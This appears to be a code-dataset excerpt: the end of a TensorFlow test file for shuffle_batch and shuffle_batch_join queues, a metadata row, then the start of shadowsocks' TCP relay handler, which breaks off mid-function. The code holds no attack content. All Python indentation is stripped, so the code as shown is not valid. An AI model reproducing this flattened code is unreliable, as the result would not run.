seed=173205,
num_threads=4,
allow_smaller_final_batch=True)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
all_counts.extend(results[0])
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the final batch with extra elements.
results = sess.run(batched)
self.assertAllEqual(results[0].shape, [extra_elements])
self.assertAllEqual(results[1].dense_shape, [extra_elements, 1])
self.assertAllEqual(results[2], [b"string"] * extra_elements)
all_counts.extend(results[0])
# Results scrambled, but include all the expected numbers.
deltas = [
all_counts[i + 1] - all_counts[i] for i in range(len(all_counts) - 1)
]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertItemsEqual(all_counts, range(total_elements))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
batched = inp.shuffle_batch(
[counter, "string"],
batch_size=batch_size,
capacity=32,
min_after_dequeue=10,
shared_name="SHARED_NAME_XYZ",
name="Q")
self.assertProtoEquals(
"s: 'SHARED_NAME_XYZ'",
batched[0].op.inputs[0].op.node_def.attr["shared_name"])
def _testKeepInputHelper(self, num_threads, enqueue_many,
keep_input_vector=False):
with self.cached_session() as sess:
batch_size = 5
num_batches = 4
examples = variables.Variable(0)
counter = examples.count_up_to(num_batches * batch_size * 2)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.zeros(
[1, 1], dtype=dtypes.int64),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
to_batch = [counter, sparse_counter, "string"]
if enqueue_many:
to_batch = inp.batch(to_batch, 4 if keep_input_vector else 1)
keep_input = array_ops.squeeze(
math_ops.equal(0, math_ops.mod(to_batch[0], 2)))
batched = inp.maybe_shuffle_batch(
to_batch,
batch_size,
10,
1,
keep_input,
num_threads=num_threads,
enqueue_many=enqueue_many)
variables.initialize_all_variables().run()
variables.initialize_local_variables().run()
threads = queue_runner_impl.start_queue_runners()
for _ in range(num_batches):
results = sess.run(batched)
self.assertAllEqual([0] * batch_size, np.mod(results[0], 2))
self.assertAllEqual([0] * batch_size, np.mod(results[1].values, 2))
self.assertAllEqual([b"string"] * batch_size, results[2])
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSingleThreadKeepInput(self):
self._testKeepInputHelper(1, False)
def testSingleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(1, True)
def testMultipleThreadKeepInput(self):
self._testKeepInputHelper(5, False)
def testMultipleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(5, True)
def testSingleThreadKeepInputPerExample(self):
self._testKeepInputHelper(1, True, keep_input_vector=True)
def testMultipleThreadKeepInputPerExample(self):
self._testKeepInputHelper(5, True, keep_input_vector=True)
def testInvalidKeepInputVector(self):
# Can't have vector `keep_input` with `enqueue_many=False`.
with self.assertRaisesRegexp(ValueError, "`keep_input` cannot be a vector"):
inp.maybe_shuffle_batch([array_ops.zeros(5)], 1, 10, 1,
keep_input=constant_op.constant([True, False]),
enqueue_many=False)
# Can't have `keep_input` with more than one dimension.
with self.assertRaisesRegexp(ValueError, "must be 0 or 1 dimensions"):
inp.maybe_shuffle_batch([array_ops.zeros(5)], 1, 10, 1,
keep_input=constant_op.constant([[True]]),
enqueue_many=True)
# `keep_input` must have dimensions determined at graph construction.
with self.assertRaisesRegexp(ValueError,
"must be known at graph construction"):
inp.maybe_shuffle_batch([array_ops.zeros(5)], 1, 10, 1,
keep_input=array_ops.placeholder(dtypes.bool),
enqueue_many=True)
def testMaybeBatchedSparseTensorInferredShape(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch([sparse], 2, 10, 1, True)
self.assertAllEqual((2,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch(
[sparse], 2, 10, 1, True, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueManyPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0], [0]], values=[1.0, 2.0], dense_shape=[2])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch(
[sparse], 2, 10, 1, [True, False], enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeUnknownRank(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch([sparse], 2, 10, 1, True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch(
[sparse], 2, 10, 1, True, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch(
[sparse], 2, 10, 1, [True, False], enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
class ShuffleBatchJoinTest(test_lib.TestCase):
def _testTwoThreadsHelper(self, use_dict):
with self.cached_session() as sess:
# Two threads, the first generates (0..24, "a").
num_a = 25
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
# The second generates (99, "b") 35 times and then stops.
num_b = 35
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
sparse_ninety_nine = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(ninety_nine, dtypes.float32)]),
dense_shape=[1])
# These get joined together and grouped into batches of 5.
batch_size = 5
if use_dict:
batched = inp.shuffle_batch_join(
[{
"c": counter,
"s": sparse_counter,
"S": "a"
}, {
"c": ninety_nine,
"s": sparse_ninety_nine,
"S": "b"
}],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=223607)
batched_fetch = [batched["c"], batched["s"], batched["S"]]
else:
batched = inp.shuffle_batch_join(
[[counter, sparse_counter, "a"],
[ninety_nine, sparse_ninety_nine, "b"]],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=223607)
batched_fetch = batched
# Shapes.
self.assertEqual(3, len(batched_fetch))
self.assertAllEqual((batch_size,), batched_fetch[0].get_shape().as_list())
self.assertAllEqual((None, 2),
batched_fetch[1].indices.get_shape().as_list())
self.assertAllEqual((None,),
batched_fetch[1].values.get_shape().as_list())
self.assertAllEqual((2,),
batched_fetch[1].dense_shape.get_shape().as_list())
self.assertAllEqual((batch_size,), batched_fetch[2].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched_fetch)
self.assertEqual(3, len(results))
self.assertEqual(len(results[0]), batch_size)
self.assertEqual(len(results[2]), batch_size)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# Some minimum level of mixing of the results of both threads.
self.assertGreater(saw_both, 1)
# Saw all the items from "a", but scrambled.
self.assertItemsEqual(all_a, range(num_a))
deltas = [all_a[i + 1] - all_a[i] for i in range(len(all_a) - 1)]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched_fetch)
for thread in threads:
thread.join()
def testTwoThreads(self):
self._testTwoThreadsHelper(use_dict=False)
def testTwoThreadsDict(self):
self._testTwoThreadsHelper(use_dict=True)
def testTwoThreadsSmallerBatch(self):
with self.cached_session() as sess:
# Two threads, the first generates (0..26, "a").
extra_elements = 2
num_a = 25 + extra_elements
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
# The second generates (99, "b") 37 times and then stops.
num_b = 35 + extra_elements
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
sparse_ninety_nine = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(ninety_nine, dtypes.float32)]),
dense_shape=[1])
# These get joined together and grouped into batches of 5.
batch_size = 5
batched = inp.shuffle_batch_join(
[[counter, sparse_counter, "a"],
[ninety_nine, sparse_ninety_nine, "b"]],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=223607,
allow_smaller_final_batch=True)
# Shapes.
self.assertEqual(3, len(batched))
self.assertAllEqual((None,), batched[0].get_shape().as_list())
self.assertAllEqual((None, 2), batched[1].indices.get_shape().as_list())
self.assertAllEqual((None,), batched[1].values.get_shape().as_list())
self.assertAllEqual((2,), batched[1].dense_shape.get_shape().as_list())
self.assertAllEqual((None,), batched[2].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
self.assertEqual(len(results[2]), batch_size)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# Reached end with 2 * extra_elements left
results = sess.run(batched)
self.assertEqual(len(results[0]), 2 * extra_elements)
self.assertAllEqual(results[1].dense_shape, [2 * extra_elements, 1])
self.assertEqual(len(results[2]), 2 * extra_elements)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].indices,
np.vstack((np.arange(2 * extra_elements),
np.zeros(2 * extra_elements))).T)
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), 2 * extra_elements)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
# Some minimum level of mixing of the results of both threads.
self.assertGreater(saw_both, 1)
# Saw all the items from "a", but scrambled, including extras.
self.assertItemsEqual(all_a, range(num_a))
deltas = [all_a[i + 1] - all_a[i] for i in range(len(all_a) - 1)]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testMismatchedDictKeys(self):
with self.assertRaisesRegexp(ValueError, "must have the same keys"):
inp.shuffle_batch_join(
[{
"c": 12,
"s": 123,
"S": "a"
}, {
"cool": -12,
"s": 99,
"S": "b"
}],
batch_size=8,
capacity=32,
min_after_dequeue=16,
seed=223607)
def testSharedName(self):
with self.cached_session():
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
batched = inp.shuffle_batch_join(
[[counter, "string"]],
batch_size=batch_size,
capacity=32,
min_after_dequeue=10,
shared_name="SHARED_NAME_XYZ",
name="Q")
# Shapes.
self.assertEqual(2, len(batched))
self.assertAllEqual((batch_size,), batched[0].get_shape().as_list())
self.assertAllEqual((batch_size,), batched[1].get_shape().as_list())
self.assertProtoEquals(
"s: 'SHARED_NAME_XYZ'",
batched[0].op.inputs[0].op.node_def.attr["shared_name"])
def _testKeepInputHelper(self, num_threads, enqueue_many,
keep_input_vector=False):
with self.cached_session() as sess:
batch_size = 5
num_batches = 4
examples = variables.Variable(0)
counter = examples.count_up_to(num_batches * batch_size * 2)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.zeros(
[1, 1], dtype=dtypes.int64),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
to_batch = [counter, sparse_counter, "string"]
if enqueue_many:
to_batch = inp.batch(to_batch, 4 if keep_input_vector else 1)
keep_input = array_ops.squeeze(
math_ops.equal(0, math_ops.mod(to_batch[0], 2)))
batched = inp.maybe_shuffle_batch_join(
[to_batch] * num_threads,
batch_size,
10,
1,
keep_input,
enqueue_many=enqueue_many)
variables.initialize_all_variables().run()
variables.initialize_local_variables().run()
threads = queue_runner_impl.start_queue_runners()
for _ in range(num_batches):
results = sess.run(batched)
self.assertAllEqual([0] * batch_size, np.mod(results[0], 2))
self.assertAllEqual([0] * batch_size, np.mod(results[1].values, 2))
self.assertAllEqual([b"string"] * batch_size, results[2])
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSingleThreadKeepInput(self):
self._testKeepInputHelper(1, False)
def testSingleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(1, True)
def testMultipleThreadKeepInput(self):
self._testKeepInputHelper(5, False)
def testMultipleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(5, True)
def testSingleThreadKeepInputPerExample(self):
self._testKeepInputHelper(1, True, keep_input_vector=True)
def testMultipleThreadKeepInputPerExample(self):
self._testKeepInputHelper(5, True, keep_input_vector=True)
def testInvalidKeepInputVector(self):
# Can't have vector `keep_input` with `enqueue_many=False`.
with self.assertRaisesRegexp(ValueError, "`keep_input` cannot be a vector"):
inp.maybe_shuffle_batch_join(
[[array_ops.zeros(5)]], 1, 10, 1,
keep_input=constant_op.constant([True, False]),
enqueue_many=False)
# Can't have `keep_input` with more than one dimension.
with self.assertRaisesRegexp(ValueError, "must be 0 or 1 dimensions"):
inp.maybe_shuffle_batch_join(
[[array_ops.zeros(5)]], 1, 10, 1,
keep_input=constant_op.constant([[True]]),
enqueue_many=True)
# `keep_input` must have dimensions determined at graph construction.
with self.assertRaisesRegexp(ValueError,
"must be known at graph construction"):
inp.maybe_shuffle_batch_join(
[[array_ops.zeros(5)]], 1, 10, 1,
keep_input=array_ops.placeholder(dtypes.bool),
enqueue_many=True)
def testMaybeBatchedSparseTensorInferredShape(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch_join([[sparse]], 2, 10, 1, True)
self.assertAllEqual((2,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch_join(
[[sparse]], 2, 10, 1, True, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueManyPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0], [0]], values=[1.0, 2.0], dense_shape=[2])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch_join(
[[sparse]], 2, 10, 1, [True, False], enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeUnknownRank(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch_join([[sparse]], 2, 10, 1, True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch_join(
[[sparse]], 2, 10, 1, True, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch_join(
[[sparse]], 2, 10, 1, [True, False], enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
if __name__ == "__main__":
test_lib.main()
| apache-2.0 | 1,367,426,583,450,489,900 | 39.769697 | 80 | 0.622927 | false |
richard-chen-1985/shadowsocks | shadowsocks/tcprelay.py | 2 | 28752 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 clowwindy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import, division, print_function, \
with_statement
import time
import socket
import errno
import struct
import logging
import traceback
import random
from shadowsocks import encrypt, eventloop, utils, common
from shadowsocks.common import parse_header
# we clear at most TIMEOUTS_CLEAN_SIZE timeouts each time
TIMEOUTS_CLEAN_SIZE = 512
# we check timeouts every TIMEOUT_PRECISION seconds
TIMEOUT_PRECISION = 4
MSG_FASTOPEN = 0x20000000
# SOCKS CMD defination
CMD_CONNECT = 1
CMD_BIND = 2
CMD_UDP_ASSOCIATE = 3
# TCP Relay can be either sslocal or ssserver
# for sslocal it is called is_local=True
# for each opening port, we have a TCP Relay
# for each connection, we have a TCP Relay Handler to handle the connection
# for each handler, we have 2 sockets:
# local: connected to the client
# remote: connected to remote server
# for each handler, we have 2 streams:
# upstream: from client to server direction
# read local and write to remote
# downstream: from server to client direction
# read remote and write to local
# for each handler, it could be at one of several stages:
# sslocal:
# stage 0 SOCKS hello received from local, send hello to local
# stage 1 addr received from local, query DNS for remote
# stage 2 UDP assoc
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
# ssserver:
# stage 0 just jump to stage 1
# stage 1 addr received from local, query DNS for remote
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
STAGE_INIT = 0
STAGE_ADDR = 1
STAGE_UDP_ASSOC = 2
STAGE_DNS = 3
STAGE_CONNECTING = 4
STAGE_STREAM = 5
STAGE_DESTROYED = -1
# stream direction
STREAM_UP = 0
STREAM_DOWN = 1
# stream wait status, indicating it's waiting for reading, etc
WAIT_STATUS_INIT = 0
WAIT_STATUS_READING = 1
WAIT_STATUS_WRITING = 2
WAIT_STATUS_READWRITING = WAIT_STATUS_READING | WAIT_STATUS_WRITING
BUF_SIZE = 32 * 1024
class TCPRelayHandler(object):
def __init__(self, server, fd_to_handlers, loop, local_sock, config,
dns_resolver, is_local):
self._server = server
self._fd_to_handlers = fd_to_handlers
self._loop = loop
self._local_sock = local_sock
self._remote_sock = None
self._config = config
self._dns_resolver = dns_resolver
self._is_local = is_local
self._stage = STAGE_INIT
self._encryptor = encrypt.Encryptor(config['password'],
config['method'])
self._fastopen_connected = False
self._data_to_write_to_local = []
self._data_to_write_to_remote = []
self._upstream_status = WAIT_STATUS_READING
self._downstream_status = WAIT_STATUS_INIT
self._client_address = local_sock.getpeername()[:2]
self._remote_address = None
if is_local:
self._chosen_server = self._get_a_server()
fd_to_handlers[local_sock.fileno()] = self
local_sock.setblocking(False)
local_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
loop.add(local_sock, eventloop.POLL_IN | eventloop.POLL_ERR)
self.last_activity = 0
self._update_activity()
def __hash__(self):
# default __hash__ is id / 16
# we want to eliminate collisions
return id(self)
@property
def remote_address(self):
return self._remote_address
def _get_a_server(self):
server = self._config['server']
server_port = self._config['server_port']
if type(server_port) == list:
server_port = random.choice(server_port)
logging.debug('chosen server: %s:%d', server, server_port)
# TODO support multiple server IP
return server, server_port
def _update_activity(self):
# tell the TCP Relay we have activities recently
# else it will think we are inactive and timed out
self._server.update_activity(self)
def _update_stream(self, stream, status):
# update a stream to a new waiting status
# check if status is changed
# only update if dirty
dirty = False
if stream == STREAM_DOWN:
if self._downstream_status != status:
self._downstream_status = status
dirty = True
elif stream == STREAM_UP:
if self._upstream_status != status:
self._upstream_status = status
dirty = True
if dirty:
if self._local_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
if self._upstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
self._loop.modify(self._local_sock, event)
if self._remote_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
if self._upstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
self._loop.modify(self._remote_sock, event)
def _write_to_sock(self, data, sock):
# write data to sock
# if only some of the data are written, put remaining in the buffer
# and update the stream to wait for writing
if not data or not sock:
return False
uncomplete = False
try:
l = len(data)
s = sock.send(data)
if s < l:
data = data[s:]
uncomplete = True
except (OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
uncomplete = True
else:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
return False
if uncomplete:
if sock == self._local_sock:
self._data_to_write_to_local.append(data)
self._update_stream(STREAM_DOWN, WAIT_STATUS_WRITING)
elif sock == self._remote_sock:
self._data_to_write_to_remote.append(data)
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
else:
logging.error('write_all_to_sock:unknown socket')
else:
if sock == self._local_sock:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
elif sock == self._remote_sock:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
else:
logging.error('write_all_to_sock:unknown socket')
return True
def _handle_stage_connecting(self, data):
if self._is_local:
data = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data)
if self._is_local and not self._fastopen_connected and \
self._config['fast_open']:
# for sslocal and fastopen, we basically wait for data and use
# sendto to connect
try:
# only connect once
self._fastopen_connected = True
remote_sock = \
self._create_remote_socket(self._chosen_server[0],
self._chosen_server[1])
self._loop.add(remote_sock, eventloop.POLL_ERR)
data = b''.join(self._data_to_write_to_remote)
l = len(data)
s = remote_sock.sendto(data, MSG_FASTOPEN, self._chosen_server)
if s < l:
data = data[s:]
self._data_to_write_to_remote = [data]
else:
self._data_to_write_to_remote = []
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) == errno.EINPROGRESS:
# in this case data is not sent at all
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
elif eventloop.errno_from_exception(e) == errno.ENOTCONN:
logging.error('fast open not supported on this OS')
self._config['fast_open'] = False
self.destroy()
else:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _handle_stage_addr(self, data):
try:
if self._is_local:
cmd = common.ord(data[1])
if cmd == CMD_UDP_ASSOCIATE:
logging.debug('UDP associate')
if self._local_sock.family == socket.AF_INET6:
header = b'\x05\x00\x00\x04'
else:
header = b'\x05\x00\x00\x01'
addr, port = self._local_sock.getsockname()[:2]
addr_to_send = socket.inet_pton(self._local_sock.family,
addr)
port_to_send = struct.pack('>H', port)
self._write_to_sock(header + addr_to_send + port_to_send,
self._local_sock)
self._stage = STAGE_UDP_ASSOC
# just wait for the client to disconnect
return
elif cmd == CMD_CONNECT:
# just trim VER CMD RSV
data = data[3:]
else:
logging.error('unknown command %d', cmd)
self.destroy()
return
header_result = parse_header(data)
if header_result is None:
raise Exception('can not parse header')
addrtype, remote_addr, remote_port, header_length = header_result
logging.info('connecting %s:%d from %s:%d' %
(common.to_str(remote_addr), remote_port,
self._client_address[0], self._client_address[1]))
self._remote_address = (remote_addr, remote_port)
# pause reading
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
self._stage = STAGE_DNS
if self._is_local:
# forward address to remote
self._write_to_sock((b'\x05\x00\x00\x01'
b'\x00\x00\x00\x00\x10\x10'),
self._local_sock)
data_to_send = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data_to_send)
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(self._chosen_server[0],
self._handle_dns_resolved)
else:
if len(data) > header_length:
self._data_to_write_to_remote.append(data[header_length:])
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(remote_addr,
self._handle_dns_resolved)
except Exception as e:
self._log_error(e)
if self._config['verbose']:
traceback.print_exc()
# TODO use logging when debug completed
self.destroy()
def _create_remote_socket(self, ip, port):
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM,
socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("getaddrinfo failed for %s:%d" % (ip, port))
af, socktype, proto, canonname, sa = addrs[0]
remote_sock = socket.socket(af, socktype, proto)
self._remote_sock = remote_sock
self._fd_to_handlers[remote_sock.fileno()] = self
remote_sock.setblocking(False)
remote_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
return remote_sock
def _handle_dns_resolved(self, result, error):
if error:
self._log_error(error)
self.destroy()
return
if result:
ip = result[1]
if ip:
try:
self._stage = STAGE_CONNECTING
remote_addr = ip
if self._is_local:
remote_port = self._chosen_server[1]
else:
remote_port = self._remote_address[1]
if self._is_local and self._config['fast_open']:
# for fastopen:
# wait for more data to arrive and send them in one SYN
self._stage = STAGE_CONNECTING
# we don't have to wait for remote since it's not
# created
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
# TODO when there is already data in this packet
else:
# else do connect
remote_sock = self._create_remote_socket(remote_addr,
remote_port)
try:
remote_sock.connect((remote_addr, remote_port))
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) == \
errno.EINPROGRESS:
pass
self._loop.add(remote_sock,
eventloop.POLL_ERR | eventloop.POLL_OUT)
self._stage = STAGE_CONNECTING
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
